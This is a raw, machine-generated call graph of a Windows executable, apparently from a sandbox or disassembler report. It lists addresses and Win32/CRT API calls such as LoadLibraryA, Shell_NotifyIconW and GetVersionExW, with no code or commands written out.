103939->103886 103951 4ba6f8 103940->103951 103954 4b7eda 48 API calls 103941->103954 103945 4bd3d2 48 API calls 103944->103945 103946 4b1807 103945->103946 103947 4bd3d2 48 API calls 103946->103947 103948 4b180f 103947->103948 103949 4bd3d2 48 API calls 103948->103949 103950 4b17e8 103949->103950 103950->103931 103952 4d010a 48 API calls 103951->103952 103953 4ba702 103952->103953 103953->103939 103954->103939 103956 4ba309 103955->103956 103958 4ba321 _memmove 103955->103958 103956->103958 103959 4bb8a7 103956->103959 103958->103939 103960 4bb8ba 103959->103960 103962 4bb8b7 _memmove 103959->103962 103961 4d010a 48 API calls 103960->103961 103961->103962 103962->103958 103963->103889 103965 4bd3d2 48 API calls 103964->103965 103966 4b7d79 103965->103966 103967 4bd3d2 48 API calls 103966->103967 103968 4b1693 103967->103968 103968->103897 103969->103924 103971 521e8b 103976 4ce44f 103971->103976 103975 521e9a 103977 4d010a 48 API calls 103976->103977 103978 4ce457 103977->103978 103979 4ce46b 103978->103979 103984 4ce74b 103978->103984 103983 4d1b2a 52 API calls __cinit 103979->103983 103983->103975 103985 4ce754 103984->103985 103986 4ce463 103984->103986 104016 4d1b2a 52 API calls __cinit 103985->104016 103988 4ce47b 103986->103988 103989 4bd3d2 48 API calls 103988->103989 103990 4ce492 GetVersionExW 103989->103990 103991 4b7e53 48 API calls 103990->103991 103992 4ce4d5 103991->103992 104017 4ce5f8 103992->104017 103996 5229f9 104000 4ce55f GetCurrentProcess 104034 4ce70e LoadLibraryA GetProcAddress 104000->104034 104001 4ce576 104003 4ce5ec GetSystemInfo 104001->104003 104004 4ce59e 104001->104004 104005 4ce5c9 104003->104005 104028 4ce694 104004->104028 104007 4ce5dc 104005->104007 104008 4ce5d7 FreeLibrary 104005->104008 104007->103979 104008->104007 104010 4ce5e4 GetSystemInfo 104012 4ce5be 104010->104012 104011 4ce5b4 104031 4ce437 104011->104031 104012->104005 104015 4ce5c4 FreeLibrary 104012->104015 104015->104005 104016->103986 104018 4ce601 104017->104018 104019 4ba2fb 48 API calls 104018->104019 104020 4ce4dd 104019->104020 104021 4ce617 104020->104021 104022 4ce625 104021->104022 104023 4ba2fb 48 API calls 104022->104023 104024 4ce4e9 104023->104024 104024->103996 104025 4ce6d1 104024->104025 104035 4ce6e3 104025->104035 104039 4ce6a6 104028->104039 104032 4ce694 2 API calls 104031->104032 104033 4ce43f GetNativeSystemInfo 104032->104033 104033->104012 104034->104001 104036 4ce55b 104035->104036 104037 4ce6ec LoadLibraryA 104035->104037 104036->104000 104036->104001 104037->104036 104038 4ce6fd GetProcAddress 104037->104038 104038->104036 104040 4ce5ac 104039->104040 104041 4ce6af LoadLibraryA 104039->104041 104040->104010 104040->104011 104041->104040 104042 4ce6c0 GetProcAddress 104041->104042 104042->104040 104043 4b29c2 104044 4b29cb 104043->104044 104045 4b29e9 104044->104045 104046 4b2a48 104044->104046 104082 4b2a46 104044->104082 104047 4b2aac PostQuitMessage 104045->104047 104048 4b29f6 104045->104048 104050 522307 104046->104050 104051 4b2a4e 104046->104051 104085 4b2a39 104047->104085 104053 4b2a01 104048->104053 104054 52238f 104048->104054 104049 4b2a2b NtdllDefWindowProc_W 104049->104085 104092 4b322e 16 API calls 104050->104092 104055 4b2a53 104051->104055 104056 4b2a76 SetTimer RegisterClipboardFormatW 104051->104056 104058 4b2a09 104053->104058 104059 4b2ab6 104053->104059 104107 4f57fb 60 API calls _memset 104054->104107 104062 4b2a5a KillTimer 104055->104062 104063 5222aa 104055->104063 104060 4b2a9f CreatePopupMenu 104056->104060 104056->104085 104057 52232e 104093 4cec33 346 API calls Mailbox 104057->104093 104065 522374 104058->104065 104066 4b2a14 104058->104066 104090 4b1e58 53 API calls _memset 104059->104090 104060->104085 104088 4b2b94 Shell_NotifyIconW _memset 104062->104088 104069 5222e3 MoveWindow 104063->104069 104070 5222af 104063->104070 104065->104049 104106 4eb31f 48 API calls 104065->104106 104072 4b2a1f 104066->104072 104073 52235f 104066->104073 104067 5223a1 104067->104049 104067->104085 104069->104085 104075 5222d2 SetFocus 104070->104075 104076 5222b3 104070->104076 104072->104049 104094 4b2b94 Shell_NotifyIconW _memset 104072->104094 104105 4f5fdb 70 API calls _memset 104073->104105 104074 4b2ac5 104074->104085 104075->104085 104076->104072 104079 5222bc 104076->104079 104077 4b2a6d 104089 4b2ac7 DeleteObject DestroyWindow Mailbox 104077->104089 104091 4b322e 16 API calls 104079->104091 104082->104049 104086 522353 104095 4b3598 104086->104095 104088->104077 104089->104085 104090->104074 104091->104085 104092->104057 104093->104072 104094->104086 104096 4b35c3 _memset 104095->104096 104108 4b38c4 104096->104108 104099 4b3648 104101 5245c2 Shell_NotifyIconW 104099->104101 104102 4b3666 Shell_NotifyIconW 104099->104102 104112 4b38e4 104102->104112 104104 4b367b 104104->104082 104105->104074 104106->104082 104107->104067 104109 5244d1 104108->104109 104110 4b3618 104108->104110 104109->104110 104111 5244da DestroyCursor 104109->104111 104110->104099 104134 4f6237 61 API calls _W_store_winword 104110->104134 104111->104110 104113 4b3900 104112->104113 104133 4b39d5 Mailbox 104112->104133 104135 4b7b6e 104113->104135 104116 4b391b 104118 4b7e53 48 API calls 104116->104118 104117 52453f LoadStringW 104120 524559 104117->104120 104119 4b3930 104118->104119 104119->104120 104121 4b3941 104119->104121 104141 4b39e8 48 API calls 2 library calls 104120->104141 104123 4b394b 104121->104123 104124 4b39da 104121->104124 104140 4b39e8 48 API calls 2 library calls 104123->104140 104126 4bc935 48 API calls 104124->104126 104125 524564 104128 524578 104125->104128 104131 4b3956 _memset _wcscpy 104125->104131 104126->104131 104142 4b39e8 48 API calls 2 library calls 104128->104142 104130 524586 104132 4b39ba Shell_NotifyIconW 104131->104132 104132->104133 104133->104104 104134->104099 104136 4d010a 48 API calls 104135->104136 104137 4b7b93 104136->104137 104138 4ba6f8 48 API calls 104137->104138 104139 4b390e 104138->104139 104139->104116 104139->104117 104140->104131 104141->104125 104142->104130 104143 4d6a80 104144 4d6a8c _flsall 104143->104144 104180 4d8b7b GetStartupInfoW 104144->104180 104146 4d6a91 104182 4da937 GetProcessHeap 104146->104182 104148 4d6ae9 104149 4d6af4 104148->104149 104267 4d6bd0 47 API calls 3 library calls 104148->104267 104183 4d87d7 104149->104183 104152 4d6afa 104153 4d6b05 __RTC_Initialize 104152->104153 104268 4d6bd0 47 API calls 3 library calls 104152->104268 104204 4dba66 104153->104204 104156 4d6b14 104157 4d6b20 GetCommandLineW 104156->104157 104269 4d6bd0 47 API calls 3 library calls 104156->104269 104223 4e3c2d GetEnvironmentStringsW 104157->104223 104160 4d6b1f 104160->104157 104164 4d6b45 104236 4e3a64 104164->104236 104167 4d6b4b 104168 4d6b56 104167->104168 104271 4d1d7b 47 API calls 3 library calls 104167->104271 104250 4d1db5 104168->104250 104171 4d6b5e 104172 4d6b69 __wwincmdln 104171->104172 104272 4d1d7b 47 API calls 3 library calls 104171->104272 104254 4b3682 104172->104254 104175 4d6b7d 104176 4d6b8c 104175->104176 104273 4d2011 47 API calls _doexit 104175->104273 104274 4d1da6 47 API calls _doexit 104176->104274 104179 4d6b91 _flsall 104181 4d8b91 104180->104181 104181->104146 104182->104148 104275 4d1e5a 30 API calls 2 library calls 104183->104275 104185 4d87dc 104276 4d8ab3 InitializeCriticalSectionAndSpinCount 104185->104276 104187 4d87e1 104188 4d87e5 104187->104188 104278 4d8afd TlsAlloc 104187->104278 104277 4d884d 50 API calls 2 library calls 104188->104277 104191 4d87ea 104191->104152 104192 4d87f7 104192->104188 104193 4d8802 104192->104193 104279 4d7616 104193->104279 104196 4d8844 104287 4d884d 50 API calls 2 library calls 104196->104287 104199 4d8823 104199->104196 104201 4d8829 104199->104201 104200 4d8849 104200->104152 104286 4d8724 47 API calls 4 library calls 104201->104286 104203 4d8831 GetCurrentThreadId 104203->104152 104205 4dba72 _flsall 104204->104205 104296 4d8984 104205->104296 104207 4dba79 104208 4d7616 __calloc_crt 47 API calls 104207->104208 104210 4dba8a 104208->104210 104209 4dbaf5 GetStartupInfoW 104214 4dbb0a 104209->104214 104219 4dbc33 104209->104219 104210->104209 104211 4dba95 _flsall @_EH4_CallFilterFunc@8 104210->104211 104211->104156 104212 4dbcf7 104303 4dbd0b RtlLeaveCriticalSection _doexit 104212->104303 104215 4dbb58 104214->104215 104217 4d7616 __calloc_crt 47 API calls 104214->104217 104214->104219 104215->104219 104221 4dbb98 InitializeCriticalSectionAndSpinCount 104215->104221 104222 4dbb8a GetFileType 104215->104222 104216 4dbc7c GetStdHandle 104216->104219 104217->104214 104218 4dbc8e GetFileType 104218->104219 104219->104212 104219->104216 104219->104218 104220 4dbcbb InitializeCriticalSectionAndSpinCount 104219->104220 104220->104219 104221->104215 104222->104215 104222->104221 104224 4e3c3e 104223->104224 104225 4d6b30 104223->104225 104342 4d7660 47 API calls __crtGetStringTypeA_stat 104224->104342 104230 4e382b GetModuleFileNameW 104225->104230 104228 4e3c64 _memmove 104229 4e3c7a FreeEnvironmentStringsW 104228->104229 104229->104225 104231 4e385f _wparse_cmdline 104230->104231 104232 4d6b3a 104231->104232 104233 4e3899 104231->104233 104232->104164 104270 4d1d7b 47 API calls 3 library calls 104232->104270 104343 4d7660 47 API calls __crtGetStringTypeA_stat 104233->104343 104235 4e389f _wparse_cmdline 104235->104232 104237 4e3a75 104236->104237 104238 4e3a7d __wsetenvp 104236->104238 104237->104167 104239 4d7616 __calloc_crt 47 API calls 104238->104239 104243 4e3aa6 __wsetenvp 104239->104243 104240 4e3afd 104241 4d28ca _free 47 API calls 104240->104241 104241->104237 104242 4d7616 __calloc_crt 47 API calls 104242->104243 104243->104237 104243->104240 104243->104242 104244 4e3b22 104243->104244 104247 4e3b39 104243->104247 104344 4e3317 47 API calls __cftoe2_l 104243->104344 104245 4d28ca _free 47 API calls 104244->104245 104245->104237 104345 4d7ab0 IsProcessorFeaturePresent 104247->104345 104249 4e3b45 104249->104167 104251 4d1dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 104250->104251 104253 4d1e00 __IsNonwritableInCurrentImage 104251->104253 104368 4d1b2a 52 API calls __cinit 104251->104368 104253->104171 104255 5223b5 104254->104255 104256 4b369c 104254->104256 104257 4b36d6 745AC8D0 104256->104257 104369 4d2025 104257->104369 104261 4b3702 104381 4b32de SystemParametersInfoW SystemParametersInfoW 104261->104381 104263 4b370e 104382 4b374e GetCurrentDirectoryW 104263->104382 104266 4b373b 104266->104175 104267->104149 104268->104153 104269->104160 104273->104176 104274->104179 104275->104185 104276->104187 104277->104191 104278->104192 104280 4d761d 104279->104280 104282 4d765a 104280->104282 104283 4d763b Sleep 104280->104283 104288 4e3e5a 104280->104288 104282->104196 104285 4d8b59 TlsSetValue 104282->104285 104284 4d7652 104283->104284 104284->104280 104284->104282 104285->104199 104286->104203 104287->104200 104289 4e3e65 104288->104289 104294 4e3e80 __calloc_impl 104288->104294 104290 4e3e71 104289->104290 104289->104294 104295 4d889e 47 API calls __getptd_noexit 104290->104295 104292 4e3e90 RtlAllocateHeap 104293 4e3e76 104292->104293 104292->104294 104293->104280 104294->104292 104294->104293 104295->104293 104297 4d89a8 RtlEnterCriticalSection 104296->104297 104298 4d8995 104296->104298 104297->104207 104304 4d8a0c 104298->104304 104300 4d899b 104300->104297 104328 4d1d7b 47 API calls 3 library calls 104300->104328 104303->104211 104305 4d8a18 _flsall 104304->104305 104306 4d8a39 104305->104306 104307 4d8a21 104305->104307 104309 4d8a37 104306->104309 104315 4d8aa1 _flsall 104306->104315 104329 4d8e52 47 API calls 2 library calls 104307->104329 104309->104306 104332 4d7660 47 API calls __crtGetStringTypeA_stat 104309->104332 104310 4d8a26 104330 4d8eb2 47 API calls 8 library calls 104310->104330 104313 4d8a4d 104316 4d8a54 104313->104316 104317 4d8a63 104313->104317 104314 4d8a2d 104331 4d1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104314->104331 104315->104300 104333 4d889e 47 API calls __getptd_noexit 104316->104333 104318 4d8984 __lock 46 API calls 104317->104318 104322 4d8a6a 104318->104322 104321 4d8a59 104321->104315 104323 4d8a8e 104322->104323 104324 4d8a79 InitializeCriticalSectionAndSpinCount 104322->104324 104334 4d28ca 104323->104334 104325 4d8a94 104324->104325 104340 4d8aaa RtlLeaveCriticalSection _doexit 104325->104340 104329->104310 104330->104314 104332->104313 104333->104321 104335 4d28fc __dosmaperr 104334->104335 104336 4d28d3 RtlFreeHeap 104334->104336 104335->104325 104336->104335 104337 4d28e8 104336->104337 104341 4d889e 47 API calls __getptd_noexit 104337->104341 104339 4d28ee GetLastError 104339->104335 104340->104315 104341->104339 104342->104228 104343->104235 104344->104243 104346 4d7abb 104345->104346 104351 4d7945 104346->104351 104350 4d7ad6 104350->104249 104352 4d795f _memset __call_reportfault 104351->104352 104353 4d797f IsDebuggerPresent 104352->104353 104359 4d8e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 104353->104359 104356 4d7a66 104358 4d8e27 GetCurrentProcess TerminateProcess 104356->104358 104357 4d7a43 __call_reportfault 104360 4db4bf 104357->104360 104358->104350 104359->104357 104361 4db4c9 IsProcessorFeaturePresent 104360->104361 104362 4db4c7 104360->104362 104364 4e4560 104361->104364 104362->104356 104367 4e450f 5 API calls 2 library calls 104364->104367 104366 4e4643 104366->104356 104367->104366 104368->104253 104370 4d8984 __lock 47 API calls 104369->104370 104371 4d2030 104370->104371 104427 4d8ae8 RtlLeaveCriticalSection 104371->104427 104373 4b36fb 104374 4d208d 104373->104374 104375 4d2097 104374->104375 104376 4d20b1 104374->104376 104375->104376 104428 4d889e 47 API calls __getptd_noexit 104375->104428 104376->104261 104378 4d20a1 104429 4d7aa0 8 API calls __cftoe2_l 104378->104429 104380 4d20ac 104380->104261 104381->104263 104430 4b4257 104382->104430 104384 4b377f IsDebuggerPresent 104385 5221b7 MessageBoxA 104384->104385 104386 4b378d 104384->104386 104389 5221d0 104385->104389 104387 4b3852 104386->104387 104386->104389 104390 4b37aa 104386->104390 104388 4b3859 SetCurrentDirectoryW 104387->104388 104392 4b3716 SystemParametersInfoW 104388->104392 104589 4f2f5b 48 API calls 104389->104589 104494 4b3bff 104390->104494 104392->104266 104395 5221e0 104399 5221f6 SetCurrentDirectoryW 104395->104399 104396 4b37c8 GetFullPathNameW 104504 4b34f3 104396->104504 104399->104392 104400 4b380f 104401 4b3818 104400->104401 104590 4ebe31 AllocateAndInitializeSid CheckTokenMembership FreeSid 104400->104590 104519 4b30a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104401->104519 104404 522213 104404->104401 104407 522224 GetModuleFileNameW 104404->104407 104409 4bcaee 48 API calls 104407->104409 104408 4b3822 104410 4b3837 104408->104410 104412 4b3598 67 API calls 104408->104412 104411 522245 104409->104411 104527 4be1f0 104410->104527 104414 522271 104411->104414 104415 52224c 104411->104415 104412->104410 104594 4b39e8 48 API calls 2 library calls 104414->104594 104591 4b39e8 48 API calls 2 library calls 104415->104591 104419 52226d GetForegroundWindow ShellExecuteW 104424 5222a5 Mailbox 104419->104424 104421 522257 104592 4b39e8 48 API calls 2 library calls 104421->104592 104424->104387 104425 522264 104593 4b39e8 48 API calls 2 library calls 104425->104593 104427->104373 104428->104378 104429->104380 104595 4b3c70 104430->104595 104434 4b4278 GetModuleFileNameW 104612 4b34c1 104434->104612 104439 4bcaee 48 API calls 104440 4b42ba 104439->104440 104627 4bd380 104440->104627 104442 4b42ca Mailbox 104443 4bcaee 48 API calls 104442->104443 104444 4b42f2 104443->104444 104445 4bd380 55 API calls 104444->104445 104446 4b4305 Mailbox 104445->104446 104447 4bcaee 48 API calls 104446->104447 104448 4b4316 104447->104448 104631 4bd2d2 104448->104631 104450 4b4328 Mailbox 104451 4bd3d2 48 API calls 104450->104451 104452 4b433b 104451->104452 104637 4b4477 104452->104637 104456 4b4355 104457 4b435f 104456->104457 104458 5220f7 104456->104458 104460 4d1bc7 _W_store_winword 59 API calls 104457->104460 104459 4b4477 48 API calls 104458->104459 104461 52210b 104459->104461 104462 4b436a 104460->104462 104465 4b4477 48 API calls 104461->104465 104462->104461 104463 4b4374 104462->104463 104464 4d1bc7 _W_store_winword 59 API calls 104463->104464 104466 4b437f 104464->104466 104467 522127 104465->104467 104468 4b4389 104466->104468 104469 52212f GetModuleFileNameW 104466->104469 104467->104469 104470 4d1bc7 _W_store_winword 59 API calls 104468->104470 104471 4b4477 48 API calls 104469->104471 104472 4b4394 104470->104472 104473 522160 104471->104473 104475 4b43d6 104472->104475 104479 4b4477 48 API calls 104472->104479 104483 522185 _wcscpy 104472->104483 104474 4bc935 48 API calls 104473->104474 104476 52216e 104474->104476 104477 4b43e7 104475->104477 104475->104483 104478 4b4477 48 API calls 104476->104478 104653 4b3320 104477->104653 104481 52217d 104478->104481 104482 4b43b8 _wcscpy 104479->104482 104481->104483 104488 4b4477 48 API calls 104482->104488 104485 4b4477 48 API calls 104483->104485 104484 4b43ff 104664 4c14a0 104484->104664 104487 5221ab 104485->104487 104487->104487 104488->104475 104489 4c14a0 48 API calls 104491 4b440f 104489->104491 104491->104489 104492 4b4477 48 API calls 104491->104492 104493 4b4451 Mailbox 104491->104493 104680 4b7bef 48 API calls 104491->104680 104492->104491 104493->104384 104499 4b3c1f _memset 104494->104499 104496 4b3c28 105219 4b3a67 SHGetMalloc 104496->105219 104498 4b3c31 105224 4b3b45 GetFullPathNameW 104498->105224 104500 4b37c0 104499->104500 105212 4b31b8 104499->105212 104500->104387 104500->104396 105300 4ba716 104504->105300 104506 4b3501 104507 4b3575 104506->104507 105311 4b21dd 86 API calls 104506->105311 104507->104395 104507->104400 104509 4b350a 104509->104507 105312 4b5460 88 API calls Mailbox 104509->105312 104511 4b3513 104511->104507 104512 4b3517 GetFullPathNameW 104511->104512 104513 4b7e53 48 API calls 104512->104513 104514 4b3541 104513->104514 104515 4b7e53 48 API calls 104514->104515 104516 4b354e 104515->104516 104517 5266b4 _wcscat 104516->104517 104518 4b7e53 48 API calls 104516->104518 104518->104507 104520 5221b0 104519->104520 104521 4b310f 104519->104521 105315 4b318a 104521->105315 104526 4b2e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104526->104408 104528 4be216 104527->104528 104587 4be226 Mailbox 104527->104587 104529 4be670 104528->104529 104528->104587 105401 4cecee 346 API calls 104529->105401 104530 4fd520 86 API calls 104530->104587 104532 4b3842 104532->104387 104588 4b2b94 Shell_NotifyIconW _memset 104532->104588 104534 4be681 104534->104532 104536 4be68e 104534->104536 104535 4be26c PeekMessageW 104535->104587 105403 4cec33 346 API calls Mailbox 104536->105403 104538 525b13 Sleep 104538->104587 104539 4be695 LockWindowUpdate DestroyWindow GetMessageW 104539->104532 104540 4be6c7 104539->104540 104543 5262a7 TranslateMessage DispatchMessageW GetMessageW 104540->104543 104541 4be4e7 104541->104532 105402 4b322e 16 API calls 104541->105402 104543->104543 104546 5262d7 104543->104546 104545 4be657 PeekMessageW 104545->104587 104546->104532 104547 4be517 timeGetTime 104547->104587 104549 4bc935 48 API calls 104549->104587 104550 4be641 TranslateMessage DispatchMessageW 104550->104545 104551 4d010a 48 API calls 104551->104587 104552 525dfc WaitForSingleObject 104555 525e19 GetExitCodeProcess CloseHandle 104552->104555 104552->104587 104553 4bd3d2 48 API calls 104583 525cce Mailbox 104553->104583 104554 526147 Sleep 104554->104583 104555->104587 104556 4be6cc timeGetTime 105404 4ccf79 49 API calls 104556->105404 104559 525feb Sleep 104559->104583 104562 4b1000 322 API calls 104562->104587 104563 4ce3a5 timeGetTime 104563->104583 104564 5261de GetExitCodeProcess 104565 5261f4 WaitForSingleObject 104564->104565 104566 52620a CloseHandle 104564->104566 104565->104566 104565->104587 104566->104583 104567 525cea Sleep 104567->104587 104568 525cd7 Sleep 104568->104567 104569 518a48 108 API calls 104569->104583 104570 4b1dce 107 API calls 104570->104583 104572 526266 Sleep 104572->104587 104573 4ccf79 49 API calls 104573->104587 104576 4bcaee 48 API calls 104576->104583 104579 4bd380 55 API calls 104579->104583 104583->104553 104583->104563 104583->104564 104583->104567 104583->104568 104583->104569 104583->104570 104583->104572 104583->104576 104583->104579 104583->104587 105406 4f56dc 49 API calls Mailbox 104583->105406 105407 4ccf79 49 API calls 104583->105407 105408 4b1000 346 API calls 104583->105408 105410 50d12a 50 API calls 104583->105410 105411 4f8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104583->105411 105412 4f6f5b 63 API calls 3 library calls 104583->105412 104585 4bcaee 48 API calls 104585->104587 104586 4bd380 55 API calls 104586->104587 104587->104530 104587->104535 104587->104538 104587->104541 104587->104545 104587->104547 104587->104549 104587->104550 104587->104551 104587->104552 104587->104554 104587->104556 104587->104559 104587->104562 104587->104567 104587->104573 104587->104583 104587->104585 104587->104586 105323 4be7e0 104587->105323 105330 4bea00 104587->105330 105380 4c44e0 104587->105380 105397 4be7b0 346 API calls Mailbox 104587->105397 105398 4c3680 346 API calls 2 library calls 104587->105398 105399 4cf381 TranslateAcceleratorW 104587->105399 105400 4ced1a IsDialogMessageW GetClassLongW 104587->105400 105405 518b20 48 API calls 104587->105405 105409 4bfa40 346 API calls 3 library calls 104587->105409 104588->104387 104589->104395 104590->104404 104591->104421 104592->104425 104593->104419 104594->104419 104596 4bd3d2 48 API calls 104595->104596 104597 4b3c80 104596->104597 104598 4ba359 104597->104598 104599 4ba366 __ftell_nolock 104598->104599 104600 4b7e53 48 API calls 104599->104600 104605 4ba4cc Mailbox 104599->104605 104602 4ba398 104600->104602 104610 4ba3ce Mailbox 104602->104610 104681 4ba4f6 104602->104681 104603 4ba4f6 48 API calls 104603->104610 104604 4ba49f 104604->104605 104606 4bcaee 48 API calls 104604->104606 104605->104434 104608 4ba4c0 104606->104608 104607 4bcaee 48 API calls 104607->104610 104685 4b5b47 48 API calls _memmove 104608->104685 104610->104603 104610->104604 104610->104605 104610->104607 104684 4b5b47 48 API calls _memmove 104610->104684 104686 4b3f9b 104612->104686 104615 4b34ea 104624 4b8182 104615->104624 104618 5234c3 104620 4d28ca _free 47 API calls 104618->104620 104621 5234d0 104620->104621 104622 4b3e39 84 API calls 104621->104622 104623 5234d9 104622->104623 104623->104623 104625 4d010a 48 API calls 104624->104625 104626 4b42ad 104625->104626 104626->104439 104628 4bd38b 104627->104628 104629 4bd3b4 104628->104629 105202 4bd772 55 API calls 104628->105202 104629->104442 104632 4bd30a 104631->104632 104633 4bd2df 104631->104633 104632->104450 104636 4bd2e6 104633->104636 105204 4bd349 53 API calls 104633->105204 104636->104632 105203 4bd349 53 API calls 104636->105203 104638 4b449a 104637->104638 104639 4b4481 104637->104639 104640 4b7e53 48 API calls 104638->104640 104641 4bc935 48 API calls 104639->104641 104642 4b4347 104640->104642 104641->104642 104643 4d1bc7 104642->104643 104644 4d1c48 104643->104644 104645 4d1bd3 104643->104645 105207 4d1c5a 59 API calls 3 library calls 104644->105207 104652 4d1bf8 104645->104652 105205 4d889e 47 API calls __getptd_noexit 104645->105205 104648 4d1c55 104648->104456 104649 4d1bdf 105206 4d7aa0 8 API calls __cftoe2_l 104649->105206 104651 4d1bea 104651->104456 104652->104456 104654 4b3334 104653->104654 104656 4b3339 Mailbox 104653->104656 105208 4b342c 48 API calls 104654->105208 104662 4b3347 104656->104662 105209 4b346e 48 API calls 104656->105209 104658 4d010a 48 API calls 104660 4b33d8 104658->104660 104659 4b3422 104659->104484 104661 4d010a 48 API calls 104660->104661 104663 4b33e3 104661->104663 104662->104658 104662->104659 104663->104484 104665 4c1606 104664->104665 104667 4c14b2 104664->104667 104665->104491 104666 4c14be 104674 4c14c9 104666->104674 105211 4b346e 48 API calls 104666->105211 104667->104666 104669 4d010a 48 API calls 104667->104669 104670 525299 104669->104670 104672 4d010a 48 API calls 104670->104672 104671 4c156d 104671->104491 104679 5252a4 104672->104679 104673 4d010a 48 API calls 104675 4c15af 104673->104675 104674->104671 104674->104673 104676 4c15c2 104675->104676 105210 4cd6b4 48 API calls 104675->105210 104676->104491 104678 4d010a 48 API calls 104678->104679 104679->104666 104679->104678 104680->104491 104682 4bb8a7 48 API calls 104681->104682 104683 4ba501 104682->104683 104683->104602 104684->104610 104685->104605 104751 4b3f5d 104686->104751 104691 525830 104693 4b3e39 84 API calls 104691->104693 104692 4b3fc6 LoadLibraryExW 104761 4b3e78 104692->104761 104695 525837 104693->104695 104697 4b3e78 3 API calls 104695->104697 104699 52583f 104697->104699 104787 4b417d 104699->104787 104700 4b3fed 104700->104699 104701 4b3ff9 104700->104701 104703 4b3e39 84 API calls 104701->104703 104705 4b34e2 104703->104705 104705->104615 104710 4fcc82 104705->104710 104707 525866 104795 4b41cb 104707->104795 104709 525873 104711 4b41a7 83 API calls 104710->104711 104712 4fccf1 104711->104712 104976 4fce59 104712->104976 104715 4b417d 64 API calls 104716 4fcd1e 104715->104716 104717 4b417d 64 API calls 104716->104717 104718 4fcd2e 104717->104718 104719 4b417d 64 API calls 104718->104719 104720 4fcd49 104719->104720 104721 4b417d 64 API calls 104720->104721 104722 4fcd64 104721->104722 104723 4b41a7 83 API calls 104722->104723 104724 4fcd7b 104723->104724 104725 4d45ec __crtGetStringTypeA_stat 47 API calls 104724->104725 104726 4fcd82 104725->104726 104727 4d45ec __crtGetStringTypeA_stat 47 API calls 104726->104727 104728 4fcd8c 104727->104728 104729 4b417d 64 API calls 104728->104729 104730 4fcda0 104729->104730 104731 4fc846 GetSystemTimeAsFileTime 104730->104731 104732 4fcdb3 104731->104732 104733 4fcddd 104732->104733 104734 4fcdc8 104732->104734 104736 4fcde3 104733->104736 104737 4fce42 104733->104737 104735 4d28ca _free 47 API calls 104734->104735 104740 4fcdce 104735->104740 104982 4fc251 118 API calls __fcloseall 104736->104982 104739 4d28ca _free 47 API calls 104737->104739 104742 4fcd07 104739->104742 104743 4d28ca _free 47 API calls 104740->104743 104741 4fce3a 104744 4d28ca _free 47 API calls 104741->104744 104742->104618 104745 4b3e39 104742->104745 104743->104742 104744->104742 104746 4b3e43 104745->104746 104750 4b3e4a 104745->104750 104983 4d4274 104746->104983 104748 4b3e6a FreeLibrary 104749 4b3e59 104748->104749 104749->104618 104750->104748 104750->104749 104800 4b3f20 104751->104800 104754 4b3f85 104756 4b3f8d FreeLibrary 104754->104756 104757 4b3f96 104754->104757 104756->104757 104758 4d4129 104757->104758 104808 4d413e 104758->104808 104760 4b3fba 104760->104691 104760->104692 104887 4b3eb3 104761->104887 104763 4b3e9f 104766 4b3ea8 FreeLibrary 104763->104766 104767 4b3eb1 104763->104767 104766->104767 104768 4b4010 104767->104768 104769 4d010a 48 API calls 104768->104769 104770 4b4025 104769->104770 104895 4b4bce 104770->104895 104772 4b4031 _memmove 104773 4b406c 104772->104773 104775 4b4129 104772->104775 104776 4b4161 104772->104776 104774 4b41cb 57 API calls 104773->104774 104784 4b4075 104774->104784 104898 4b31f2 CreateStreamOnHGlobal 104775->104898 104909 4fd03f 93 API calls 104776->104909 104779 4b417d 64 API calls 104779->104784 104781 4b4109 104781->104700 104782 525794 104783 4b41a7 83 API calls 104782->104783 104785 5257a8 104783->104785 104784->104779 104784->104781 104784->104782 104904 4b41a7 104784->104904 104786 4b417d 64 API calls 104785->104786 104786->104781 104788 4b418f 104787->104788 104789 52587d 104787->104789 104933 4d44ae 104788->104933 104792 4fc846 104953 4fc6a0 104792->104953 104794 4fc85c 104794->104707 104796 4b41da 104795->104796 104797 5258bf 104795->104797 104958 4d4af5 104796->104958 104799 4b41e2 104799->104709 104804 4b3f32 104800->104804 104803 4b3f08 LoadLibraryA GetProcAddress 104803->104754 104805 4b3f28 104804->104805 104806 4b3f3b LoadLibraryA 104804->104806 104805->104754 104805->104803 104806->104805 104807 4b3f4c GetProcAddress 104806->104807 104807->104805 104811 4d414a _flsall 104808->104811 104809 4d415d 104856 4d889e 47 API calls __getptd_noexit 104809->104856 104811->104809 104813 4d418e 104811->104813 104812 4d4162 104857 4d7aa0 8 API calls __cftoe2_l 104812->104857 104827 4df278 104813->104827 104816 4d4193 104817 4d419c 104816->104817 104818 4d41a9 104816->104818 104858 4d889e 47 API calls __getptd_noexit 104817->104858 104820 4d41d3 104818->104820 104821 4d41b3 104818->104821 104841 4df390 104820->104841 104859 4d889e 47 API calls __getptd_noexit 104821->104859 104824 4d416d _flsall @_EH4_CallFilterFunc@8 104824->104760 104828 4df284 _flsall 104827->104828 104829 4d8984 __lock 47 API calls 104828->104829 104830 4df292 104829->104830 104831 4df309 104830->104831 104837 4d8a0c __mtinitlocknum 47 API calls 104830->104837 104839 4df302 104830->104839 104864 4d5ade 48 API calls __lock 104830->104864 104865 4d5b48 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 104830->104865 104866 4d7660 47 API calls __crtGetStringTypeA_stat 104831->104866 104834 4df310 104836 4df31f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 104834->104836 104834->104839 104835 4df37c _flsall 104835->104816 104836->104839 104837->104830 104861 4df387 104839->104861 104849 4df3b0 __wopenfile 104841->104849 104842 4df3ca 104871 4d889e 47 API calls __getptd_noexit 104842->104871 104844 4df3cf 104872 4d7aa0 8 API calls __cftoe2_l 104844->104872 104846 4df5e8 104868 4e7179 104846->104868 104847 4d41de 104860 4d4200 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104847->104860 104849->104842 104855 4df585 104849->104855 104873 4d247b 59 API calls 2 library calls 104849->104873 104851 4df57e 104851->104855 104874 4d247b 59 API calls 2 library calls 104851->104874 104853 4df59d 104853->104855 104875 4d247b 59 API calls 2 library calls 104853->104875 104855->104842 104855->104846 104856->104812 104857->104824 104858->104824 104859->104824 104860->104824 104867 4d8ae8 RtlLeaveCriticalSection 104861->104867 104863 